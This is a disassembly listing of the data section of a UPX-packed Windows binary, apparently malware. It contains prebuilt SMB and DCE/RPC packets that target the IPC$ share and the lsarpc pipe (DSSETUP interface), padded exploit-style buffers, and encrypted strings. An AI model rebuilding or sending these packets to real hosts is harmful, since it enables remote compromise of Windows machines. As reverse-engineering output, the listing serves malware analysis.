off_4261A8 dd offset off_42A25C ; DATA XREF: UPX0:004261DC�o
; UPX0:0042624C�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_4261C0 dd offset off_42A274 ; DATA XREF: UPX0:004261D8�o
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4261C0
dd offset off_4261A8
dword_4261E0 dd 3 dup(0) ; DATA XREF: UPX0:00426204�o
dd 2, 4261D8h
dword_4261F4 dd 3 dup(0) ; DATA XREF: UPX0:00424EFC�o
dd offset off_42A274
dd offset dword_4261E0+4
off_426208 dd offset off_42A2B4 ; DATA XREF: UPX0:00426220�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_426208
dd 0
db 0 ; DATA XREF: UPX0:00426248�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 426220h
dword_426238 dd 3 dup(0) ; DATA XREF: UPX0:00424FC4�o
dd offset off_42A2B4
dd offset unk_426228
dd offset off_4261A8
dword_426250 dd 3 dup(0) ; DATA XREF: UPX0:00426274�o
dd 1, 42624Ch
dword_426264 dd 3 dup(0) ; DATA XREF: UPX0:00424FFC�o
dd offset off_42A25C
dd offset dword_426250+4
dd 0
dword_42627C dd 2 dup(0) ; DATA XREF: sub_4204A1+C�o
; sub_4204A1:loc_4204B4�o
dword_426284 dd 0 ; DATA XREF: sub_4204E5+C�o
; sub_4204E5:loc_4204F8�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset sub_4024DF
align 10h
dd 2 dup(1), 426298h
dword_4262BC dd 19930520h, 2, 426288h, 1, 4262A8h, 2 dup(0) ; DATA XREF: SEH_4023D0�o
dd 0FFFFFFFFh, 422F00h
dword_4262E0 dd 19930520h, 1, 4262D8h, 4 dup(0) ; DATA XREF: SEH_4027A0�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset sub_40452C
dd 2 dup(0)
dd 2 dup(1), 42630Ch
dword_426330 dd 19930520h, 2, 4262FCh, 1, 42631Ch, 2 dup(0) ; DATA XREF: SEH_403950�o
dd 0FFFFFFFFh, 422F30h, 0FFFFFFFFh, 422F3Eh
dword_42635C dd 19930520h, 2, 42634Ch, 4 dup(0) ; DATA XREF: SEH_404800�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_40543F
align 10h
dd 2 dup(1), 426388h
dword_4263AC dd 19930520h, 2, 426378h, 1, 426398h, 2 dup(0) ; DATA XREF: SEH_405390�o
dd 0FFFFFFFFh, 422F70h, 0
dd offset loc_422F7B
dword_4263D8 dd 19930520h, 2, 4263C8h, 4 dup(0) ; DATA XREF: SEH_406B60�o
dd 0FFFFFFFFh, 422F90h
dword_4263FC dd 19930520h, 1, 4263F4h, 5 dup(0) ; DATA XREF: SEH_406C20�o
dd offset off_429F58
dd 0
dd 0FFFFFFFFh, 0
dword_42642C dd 30Ch, 407370h, 1, 426418h ; DATA XREF: UPX0:00426448�o
dword_42643C dd 0 ; DATA XREF: sub_407140+105�o
dd offset loc_4073D0
align 8
dd offset dword_42642C+8
dd 0FFFFFFFFh, 422FB0h
dword_426454 dd 19930520h, 1, 42644Ch, 4 dup(0) ; DATA XREF: SEH_407140�o
dd 1, 429F78h, 0
dd 0FFFFFFFFh, 0
dd 4, 0
dd 1, 429F88h, 0
dd 0FFFFFFFFh, 0
dd 4, 0
dword_4264A8 dd 2, 42648Ch, 426470h ; DATA XREF: UPX0:004264C0�o
dword_4264B4 dd 3 dup(0) ; DATA XREF: sub_4085A0:loc_408630�o
; sub_40F2E0:loc_40F36E�o ...
dd offset dword_4264A8
dd 0FFFFFFFFh, 422FD0h
dword_4264CC dd 19930520h, 1, 4264C4h, 4 dup(0) ; DATA XREF: SEH_4085A0�o
dd 0FFFFFFFFh, 422FF0h, 0
dd offset loc_422FFE
dd 1, 42300Ch, 2, 42301Ah, 3, 423028h
dword_426510 dd 19930520h, 5, 4264E8h, 4 dup(0) ; DATA XREF: SEH_408900�o
dd 0FFFFFFFFh, 423040h
dword_426534 dd 19930520h, 1, 42652Ch, 4 dup(0) ; DATA XREF: SEH_408A20�o
dd 0FFFFFFFFh, 423060h, 0
dd offset loc_423068
dd 0
dd offset loc_423073
dd 0
dd offset loc_42307E
dword_426570 dd 19930520h, 4, 426550h, 4 dup(0) ; DATA XREF: SEH_408B20�o
dd 0FFFFFFFFh, 5 dup(0)
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_408D78
dd 3 dup(0)
dd offset sub_408DEE
dd 2 dup(1), 2, 1, 4265ACh, 0
dd 2, 3, 1, 4265BCh
dword_4265F4 dd 19930520h, 4, 42658Ch, 2, 4265CCh, 2 dup(0) ; DATA XREF: SEH_408C40�o
dd 0FFFFFFFFh, 4230B0h
dword_426618 dd 19930520h, 1, 426610h, 4 dup(0) ; DATA XREF: SEH_408ED0�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_4099DF
dd 2 dup(0)
dd 2 dup(1), 426644h
dword_426668 dd 19930520h, 2, 426634h, 1, 426654h, 2 dup(0) ; DATA XREF: SEH_409710�o
dd 0FFFFFFFFh, 4230E0h
dword_42668C dd 19930520h, 1, 426684h, 4 dup(0) ; DATA XREF: SEH_409BA0�o
dd 0FFFFFFFFh, 423100h
dword_4266B0 dd 19930520h, 1, 4266A8h, 4 dup(0) ; DATA XREF: SEH_409C50�o
dd 0FFFFFFFFh, 423120h, 7 dup(0)
dd offset loc_40A18D
dd 2 dup(1), 2, 1, 4266E4h
dword_426708 dd 19930520h, 3, 4266CCh, 1, 4266F4h, 2 dup(0) ; DATA XREF: SEH_409E30�o
dd 0FFFFFFFFh, 423140h, 0
dd offset loc_423148
dword_426734 dd 19930520h, 2, 426724h, 4 dup(0) ; DATA XREF: SEH_40AA90�o
dd 0FFFFFFFFh, 423160h
dword_426758 dd 19930520h, 1, 426750h, 4 dup(0) ; DATA XREF: SEH_40AB20�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_40AC15
dd 2 dup(0)
dd 2 dup(1), 426784h
dword_4267A8 dd 19930520h, 2, 426774h, 1, 426794h, 2 dup(0) ; DATA XREF: SEH_40ABB0�o
dd 0FFFFFFFFh, 423190h, 0FFFFFFFFh, 42319Bh, 0FFFFFFFFh
dd 4231A6h, 0FFFFFFFFh, 4231B1h, 0FFFFFFFFh, 4231BCh, 0FFFFFFFFh
dd 4231C7h, 0FFFFFFFFh, 4231D2h, 0FFFFFFFFh, 4231DDh, 0FFFFFFFFh
dd 4231E8h, 0FFFFFFFFh, 4231F3h, 0FFFFFFFFh, 4231FEh, 0FFFFFFFFh
dd 423209h
dword_426824 dd 19930520h, 0Ch, 4267C4h, 4 dup(0) ; DATA XREF: SEH_40C480�o
dd 0FFFFFFFFh, 4 dup(0)
dd offset sub_423220
dd 0FFFFFFFFh, 4 dup(0)
dd offset sub_40C945
dd 0
dd 2, 3, 1, 426860h
dword_426884 dd 19930520h, 4, 426840h, 1, 426870h, 2 dup(0) ; DATA XREF: SEH_40C7C0�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
dw 40h
dd 2 dup(0)
dd 2 dup(1), 4268B0h
dword_4268D4 dd 19930520h, 2, 4268A0h, 1, 4268C0h, 2 dup(0) ; DATA XREF: SEH_40C950�o
dd 0FFFFFFFFh, 2 dup(0)
dd offset sub_423250
dd 0FFFFFFFFh, 4 dup(0)
dd offset sub_40CD75
dd 0
dd 1, 2, 1, 426908h
dword_42692C dd 19930520h, 3, 4268F0h, 1, 426918h, 2 dup(0) ; DATA XREF: SEH_40CCF0�o
dd 0FFFFFFFFh, 423270h
dword_426950 dd 19930520h, 1, 426948h, 4 dup(0) ; DATA XREF: SEH_40F3B0�o
dd 0FFFFFFFFh, 423290h
dword_426974 dd 19930520h, 1, 42696Ch, 4 dup(0) ; DATA XREF: SEH_4106A0�o
dd 0FFFFFFFFh, 4232B0h
dword_426998 dd 19930520h, 1, 426990h, 4 dup(0) ; DATA XREF: SEH_410DB0�o
dd 0FFFFFFFFh, 4232D0h
dword_4269BC dd 19930520h, 1, 4269B4h, 4 dup(0) ; DATA XREF: SEH_410F70�o
dd 0FFFFFFFFh, 2 dup(0)
dd offset sub_4232F0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_429F88
dd 0FFFFFFE4h, 4112DFh, 0
dd 1, 2, 1, 4269F0h
dword_426A14 dd 19930520h, 3, 4269D8h, 1, 426A00h, 2 dup(0) ; DATA XREF: SEH_4110E0�o
dd 0FFFFFFFFh, 423310h
dword_426A38 dd 19930520h, 1, 426A30h, 4 dup(0) ; DATA XREF: SEH_411360�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_411F21
dd 2 dup(0)
dd 2 dup(1), 426A64h
dword_426A88 dd 19930520h, 2, 426A54h, 1, 426A74h, 2 dup(0) ; DATA XREF: SEH_411DE0�o
dd 0FFFFFFFFh, 423340h, 0
dd offset loc_42334B
dd 1, 423356h
dword_426ABC dd 19930520h, 3, 426AA4h, 4 dup(0) ; DATA XREF: SEH_412860�o
dd 0FFFFFFFFh, 423370h
dword_426AE0 dd 19930520h, 1, 426AD8h, 4 dup(0) ; DATA XREF: SEH_412CA0�o
dd 0FFFFFFFFh, 423390h, 0
dd offset loc_42339B
dword_426B0C dd 19930520h, 2, 426AFCh, 4 dup(0) ; DATA XREF: SEH_4130B0�o
dd 0FFFFFFFFh, 4233B0h, 0
dd offset loc_4233BB
dd 1, 4233C6h, 2, 4233CEh, 3, 4233D9h, 4, 4233E1h
dword_426B58 dd 19930520h, 6, 426B28h, 4 dup(0) ; DATA XREF: SEH_413410�o
dd 0FFFFFFFFh, 423400h
dword_426B7C dd 19930520h, 1, 426B74h, 4 dup(0) ; DATA XREF: SEH_413B10�o
dd 0FFFFFFFFh, 423420h, 0
dd offset loc_423428
dd 1, 423430h
dword_426BB0 dd 19930520h, 3, 426B98h, 4 dup(0) ; DATA XREF: SEH_414370�o
dd 0FFFFFFFFh, 423450h, 0
dd offset loc_42345B
dd 1, 423466h, 2, 423471h, 3, 42347Ch, 4, 423487h, 5, 423492h
dd 6, 42349Dh, 7, 4234A8h, 8, 4234B3h
dword_426C1C dd 19930520h, 0Ah, 426BCCh, 4 dup(0) ; DATA XREF: SEH_414690�o
dd 0FFFFFFFFh, 4234D0h, 0
dd offset loc_4234D8
dword_426C48 dd 19930520h, 2, 426C38h, 4 dup(0) ; DATA XREF: SEH_415460�o
dd 0FFFFFFFFh, 4234F0h
dword_426C6C dd 19930520h, 1, 426C64h, 4 dup(0) ; DATA XREF: SEH_415AE0�o
dd 0FFFFFFFFh, 423510h
dword_426C90 dd 19930520h, 1, 426C88h, 5 dup(0) ; DATA XREF: SEH_418F90�o
dd offset off_42A25C
align 8
dd 0FFFFFFFFh, 0
dd 0Ch, 41AC96h, 0
dd offset off_42A274
dd 0
dd 0FFFFFFFFh, 0
dword_426CDC dd 0Ch, 41920Ch, 2, 426CC8h, 426CACh ; DATA XREF: UPX0:00426CFC�o
dword_426CF0 dd 0 ; DATA XREF: sub_419224+4F�o
dd offset sub_4191E5
dd 0
dd offset dword_426CDC+8
dd 4C0h dup(0)
dword_428000 dd 0 ; DATA XREF: sub_41EA33+45�o
dd offset sub_41AD1F
dd offset sub_423530
dd offset loc_423550
dd offset loc_423560
dd offset loc_423570
dd offset loc_423580
dd offset loc_423590
dd offset loc_4235A0
dd offset loc_4235B0
dd offset loc_4235C0
dword_42802C dd 0 ; DATA XREF: sub_41EA33+4C�o
dword_428030 dd 0 ; DATA XREF: sub_41EA33+12�o
dd offset sub_41A241
dd offset sub_41AA71
dd offset sub_4214E4
dd offset sub_41EC64
dword_428044 dd 0 ; DATA XREF: sub_41EA33+17�o
dword_428048 dd 0 ; DATA XREF: sub_41EA9D+73�o
dd offset sub_41AB1A
dword_428050 dd 0 ; DATA XREF: sub_41EA9D:loc_41EB0B�o
dword_428054 dd 0 ; CODE XREF: sub_41E9D9+23�p
; DATA XREF: sub_41EA9D+83�o
dd offset sub_41EC77
dword_42805C dd 0 ; DATA XREF: sub_41EA9D:loc_41EB1B�o
dword_428060 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_404DB0+2D8�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_4280F0 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404DB0+308�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_4281A0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404DB0+332�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_428280 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404DB0+7E�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
db 43h, 0, 24h
dword_4282D7 dd 3F000000h ; DATA XREF: sub_404DB0+C9�r
dword_4282DB dd 3F3F3F3Fh ; DATA XREF: sub_404DB0+D6�r
byte_4282DF db 0 ; DATA XREF: sub_404DB0+DD�r
dd 2 dup(0)
dword_4282E8 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404DB0+3CB�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_428358 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404DB0+3F5�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_428400 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404DB0+51F�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_428480 dd offset unk_401495 ; DATA XREF: sub_404DB0+548�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_428518 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404DB0+444�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_428588 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404DB0+46E�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_428600 dd 0 ; DATA XREF: sub_404DB0+4A5�o
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 10h dup(0)
dword_4286C0 dd 1004600h ; DATA XREF: sub_404DB0+252�r
dd 1, 0Dh dup(0)
dword_4286FC dd 751C123Ch ; DATA XREF: sub_404DB0+140�r
; sub_404DB0+165�r
dd 2, 0Dh dup(0)
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_428778: ; DATA XREF: sub_406AE0+1A�o
; sub_423530+5�o
dec ebp
js short loc_4287CA
retn 100Fh
; ---------------------------------------------------------------------------
dw 422Fh
dd 76062FAFh, 5F2BC9E0h, 1EC51681h, 0A690B37Ch, 925B4BC2h
dd 603B613Fh, 7F1E5C01h, 77A6EA92h, 7BAA3ABAh, 0CA214704h
dd 0ADD31EE9h, 0E1B0E863h, 0CD8D8F4Fh, 50ACD565h, 66BB22Dh
dd 4F51D1A6h, 7AF48123h, 57745E87h
db 52h, 2Ch
; ---------------------------------------------------------------------------
loc_4287CA: ; CODE XREF: UPX0:00428779�j
pusha
xchg eax, edi
mov edi, 0E74A7615h
xor al, 0E9h
leave
sbb [eax], edi
stosd
insd
aam 81h
hlt
; ---------------------------------------------------------------------------
db 0DAh
dd 4EE6FA3Ch, 16279543h, 4ABB3902h, 0D5897978h, 5BC0DD97h
dd 0B38EAE62h, 0D26E760Fh
dword_4287F8 dd 9D23142Ch, 295C796Bh, 2FDCh, 0A313420Eh, 2B4E7D50h
; DATA XREF: sub_4023D0+65�o
dd 65CC3h, 82612760h, 2F342Eh
dword_428818 dd 0C23B0039h ; DATA XREF: sub_401FC0+90�o
dword_42881C dd 0A0220C25h, 0Fh ; DATA XREF: sub_401FC0+C4�o
dword_428824 dd 0AE3B103Eh, 0Fh ; DATA XREF: sub_401FC0+ED�o
dword_42882C dd 0B33F103Dh, 0Fh ; DATA XREF: sub_401FC0+116�o
dword_428834 dd 0A63F0B2Ch, 0Fh ; DATA XREF: sub_401FC0+13F�o
dword_42883C dd 0AC371A29h, 0Fh ; DATA XREF: sub_401FC0+168�o
dword_428844 dd 0A52D1A39h, 0Fh ; DATA XREF: sub_401FC0+18D�o
dword_42884C dd 0AA2D1C2Ch, 0Fh ; DATA XREF: sub_401FC0+1B9�o
dword_428854 dd 0C2655667h ; DATA XREF: sub_4021E0+72�o
dword_428858 dd 0B73C1604h, 21467669h, 2684AC6h, 2B4A8DC0h, 719536E0h
; DATA XREF: sub_4085A0+44�o
dd 0C3E4DD15h, 0F67E71B0h, 968411Fh, 5A24397Bh, 2386CAF6h
dd 17CB4ED5h, 0CA45623Eh, 0E7723C04h, 67E1A6Bh, 187340ECh
dd 3B0EF494h, 5D8B578Bh, 0D2FEC613h, 983F6EFFh, 0F783271h
dd 426A3274h, 36AC8EB7h, 0EC579E8h, 0EF1C336Ah, 0D3148Dh
dword_4288BC dd 0A7221903h, 1032h ; DATA XREF: sub_40F730+1A�o
dword_4288C4 dd 0FF032C19h, 0Fh ; DATA XREF: sub_40F730+80�o
dword_4288CC dd 871F2119h, 1032h ; DATA XREF: sub_40F730+11A�o
dword_4288D4 dd 906F2000h, 3040736Ah, 625CBh ; DATA XREF: sub_40FA60+1A�o
dword_4288E0 dd 0A42A0A1Dh, 2C4A626Ah, 763B4ACCh ; DATA XREF: sub_40FA60+6A�o
dword_4288EC dd 0AA2C0008h, 27487E6Eh, 2F92h ; DATA XREF: sub_40FA60+112�o
dword_4288F8 dd 4F7247h ; DATA XREF: sub_40FA60+17B�o
dword_4288FC dd 8F0E360Eh, 277D304Ah, 127440CCh, 2BC3DAh ; DATA XREF: sub_40FCA0+15�o
dword_42890C dd 0AF2E360Eh, 2F2D6Ah ; DATA XREF: sub_40FCA0+6A�o
dword_428914 dd 4F7247h ; DATA XREF: sub_40FCA0+D8�o
dword_428918 dd 0E7611C68h, 260A3E6Bh, 76620A81h ; DATA XREF: sub_410AC0+66�o
dword_428924 dd 0A71D580Ch, 265D7F6Ch, 62595h ; DATA XREF: sub_40FDE0+19�o
dword_428930 dd 4F7247h ; DATA XREF: sub_40FDE0+CB�o
dword_428934 dd 906F2B03h, 3040736Ah, 760C15CBh ; DATA XREF: sub_40FF30+14�o
dword_428940 dd 0C2722B03h ; DATA XREF: sub_40FF30+6B�o
dword_428944 dd 8F0E360Eh, 104Ah ; DATA XREF: sub_410030+CF�o
; ---------------------------------------------------------------------------
loc_42894C: ; DATA XREF: sub_410030+12C�o
push ds
aaa
push cs
locret_42894F: ; DATA XREF: sub_410030+201�o
retn 2D03h
; ---------------------------------------------------------------------------
dw 8E03h
dd 0Fh
dword_428958 dd 0C21C331Ah ; DATA XREF: sub_410030+25D�o
dword_42895C dd 0C21D2C1Dh ; DATA XREF: sub_410030+2B9�o
dword_428960 dd 84013105h, 1040h ; DATA XREF: sub_410030+319�o
dword_428968 dd 84013100h, 1040h ; DATA XREF: sub_410030+379�o
dword_428970 dd 0C21B2019h ; DATA XREF: sub_410030+401�o
dword_428974 dd 9608560Ch, 11025443h, 33507DEAh, 31059AB2h, 0C562E4h
; DATA XREF: sub_411360+7A�o
dword_428988 dd 9608560Fh, 11025443h, 33507DEAh, 31059AB2h, 0C562E4h
; DATA XREF: sub_411360+C1�o
dword_42899C dd 9608560Eh, 11025443h, 33507DEAh, 31059AB2h, 0C562E4h
; DATA XREF: sub_411360+10E�o
dword_4289B0 dd 96085609h, 11025443h, 33507DEAh, 31059AB2h, 0C562E4h
; DATA XREF: sub_411360+15B�o
dword_4289C4 dd 96085608h, 11025443h, 33507DEAh, 31059AB2h, 0C562E4h
; DATA XREF: sub_411360+1A8�o
dword_4289D8 dd 9608560Bh, 11025443h, 33507DEAh, 31059AB2h, 0C562E4h
; DATA XREF: sub_411360+1F5�o
dword_4289EC dd 9608560Ah, 11025443h, 33507DEAh, 31059AB2h, 0C562E4h
; DATA XREF: sub_411360+242�o
dword_428A00 dd 96085605h, 11025443h, 33507DEAh, 31059AB2h, 0C562E4h
; DATA XREF: sub_411360+28F�o
dword_428A14 dd 96085604h, 11025443h, 33507DEAh, 31059AB2h, 0C562E4h
; DATA XREF: sub_411360+2DC�o
dword_428A28 dd 0AF203C6Dh, 6241796Eh, 56340EBh, 2B44A7C0h, 77BD73A1h
; DATA XREF: sub_411360+332�o
dd 0F6B0C70Fh, 0F33924B0h, 6A420D5Dh, 1
dword_428A4C dd 0A9205515h, 344C755Dh, 61B9Bh, 0B23B0C25h, 73003F35h
; DATA XREF: sub_4028F0+84�o
dd 4628189Dh, 6E05F9CEh, 31B664AEh, 7Ch, 0B23B0C25h, 32003F35h
dd 1715F81h, 2D44E78Fh, 6BA639E6h, 0C8F5C10Eh, 5B64B6h
dword_428A8C dd 0B23B0C25h, 31003F35h, 19765FDAh, 6C05BD92h, 71B623B7h
; DATA XREF: sub_4028F0+AC�o
dd 0CFBEC71Ah, 0BD342DACh, 1249145Ch, 506A3264h, 92h
dword_428AB4 dd 0B23B0C25h, 31003F35h, 19765FDAh, 2C05BD92h, 69B170EEh
; DATA XREF: sub_4028F0+CC�o
dd 90F5C11Dh, 0F17579F2h, 3140C50h, 1A6C2E74h, 77899EFCh
dword_428ADC dd 0B23B0C25h, 23003F35h, 47656C1h, 7152B18Fh, 31B173EFh
; DATA XREF: sub_4028F0+ED�o
dd 0D4E2C61Fh, 0BD2F25A7h, 3Fh
dword_428AFC dd 0B23B0C25h, 31003F35h, 19765FDAh, 3A05BD92h, 6CAC60EFh
; DATA XREF: sub_4028F0+10E�o
dd 0C4F5C413h, 0F52924ECh, 124E0210h, 0B703973h, 0EABDh
dword_428B24 dd 0B23B0C25h, 31003F35h, 19765FDAh, 3105BD92h, 70AA7DE8h
; DATA XREF: sub_4028F0+12F�o
dd 0CEF3D608h, 0FF3428ECh, 124E0210h, 0B703973h, 0EABDh
; ---------------------------------------------------------------------------
loc_428B4C: ; DATA XREF: sub_4028F0+150�o
and eax, 35B23B0Ch
aas
add [edi], ah
retn 6F4Eh
; ---------------------------------------------------------------------------
db 1Ah
dd 2F5E9ACDh, 6AB779F1h, 0C3F5E052h, 0FE2E2DA9h, 0D540211h
dd 0D6B3F2Eh, 3C88FE0h, 3A95h
dword_428B78 dd 0B23B0C25h, 2F003F35h, 1F6742D6h, 6F1AE78Ch, 6AAA7EB1h
; DATA XREF: sub_4028F0+171�o
dd 0CAF9D211h, 0FF3428ECh, 124E0210h, 0B703973h, 0EABDh
dword_428BA0 dd 0B23B0C25h, 2F003F35h, 1F6742D6h, 334FE78Ch, 70EB62F9h
; DATA XREF: sub_4028F0+192�o
dd 0C5BFC719h, 0F72939B7h, 60141551h
dword_428BC0 dd 0B23B0C25h, 2F003F35h, 1F6742D6h, 3758E78Ch, 7FB772E0h
; DATA XREF: sub_4028F0+1B3�o
dd 0C8BEDB1Fh, 0F1743FA7h, 549134Ah, 7F31286Fh
dword_428BE4 dd 0B23B0C25h, 2F003F35h, 1F6742D6h, 334AE78Ch, 6CAA70EDh
; DATA XREF: sub_4028F0+1D4�o
dd 0CAF9D211h, 0FF3428ECh, 124E0210h, 0B703973h, 0EABDh
; ---------------------------------------------------------------------------
loc_428C0C: ; DATA XREF: sub_4028F0+1FC�o
and eax, 35B23B0Ch
aas
add [ecx], dh
retf 705Dh
; ---------------------------------------------------------------------------
db 13h
dd 3205F892h, 77A47BF8h, 0CEE09D10h, 0E02E28EDh, 1455044Dh
dd 5C2Eh
dword_428C30 dd 0B23B0C25h, 2F003F35h, 1F6742D6h, 3049E78Ch, 30A073EAh
; DATA XREF: sub_4028F0+21D�o
dd 89FDDC1Fh, 0E0293EA1h, 4F4F0F5Ah, 1
dword_428C54 dd 0B23B0C25h, 2F003F35h, 586A46CEh, 6D1EFFD9h, 6CAA38B1h
; DATA XREF: sub_4028F0+23E�o
dd 0D3F39C1Bh, 0FC3E39B0h, 3B4E4Bh
dword_428C74 dd 0B23B0C25h, 70003F35h, 47281E9Eh, 6A05FDD8h, 31F238B4h
; DATA XREF: sub_4028F0+25F�o
dd 0D4E2C61Fh, 0BD2F25A7h, 3Fh
dword_428C94 dd 0B23B0C25h, 37003F35h, 2674BDFh, 3158E785h, 71B661EEh
; DATA XREF: sub_4028F0+280�o
dd 0C5BEC71Ah, 0E03065ADh, 124E0210h, 0B703973h, 0EABDh
dword_428CBC dd 0B23B0C25h, 37003F35h, 2674BDFh, 285CE785h, 77A47BF6h
; DATA XREF: sub_4028F0+2A1�o
dd 0D4FF9D10h, 0E73864A5h, 0E5E134Dh, 1E7375h
dword_428CE0 dd 0B23B0C25h, 37003F35h, 2674BDFh, 3D4EE785h, 71AC7AE8h
; DATA XREF: sub_4028F0+2C2�o
dd 0C9F39D12h, 0E73864AFh, 0E5E134Dh, 1E7375h
dword_428D04 dd 0B23B0C25h, 37003F35h, 2674BDFh, 3A46E785h, 6CA47FE5h
; DATA XREF: sub_4028F0+2E3�o
dd 0C5BEC913h, 0F17426ADh, 549134Ah, 7F31286Fh
dword_428D28 dd 0B23B0C25h, 37003F35h, 2674BDFh, 3048E785h, 31B362AFh
; DATA XREF: sub_4028F0+304�o
dd 0D4E2C61Fh, 0BD2F25A7h, 3Fh
; ---------------------------------------------------------------------------
loc_428D48: ; DATA XREF: sub_4028F0+32C�o
and eax, 35B23B0Ch
aas
add ds:452858D8h, dh
cmp byte ptr [ebp+64E02C4Ah], 0ACh
jnb short loc_428DAF
sar bh, 1
retf
; ---------------------------------------------------------------------------
dd 0E02E28EDh, 1455044Dh, 5C2Eh
; ---------------------------------------------------------------------------
loc_428D6C: ; DATA XREF: sub_4028F0+34D�o
and eax, 35B23B0Ch
aas
add [eax], dh
retf 6A4Eh
; ---------------------------------------------------------------------------
db 18h
dd 3006B099h, 6DAA65F5h, 88E0C352h, 0F1743EB0h, 549134Ah
dd 7F31286Fh
dword_428D90 dd 0B23B0C25h, 27003F35h, 19285BDCh, 2C44BA94h, 78AB7FAFh
; DATA XREF: sub_4028F0+36E�o
dd 0D3F39C13h, 0FC3E39B0h
db 4Bh, 4Eh
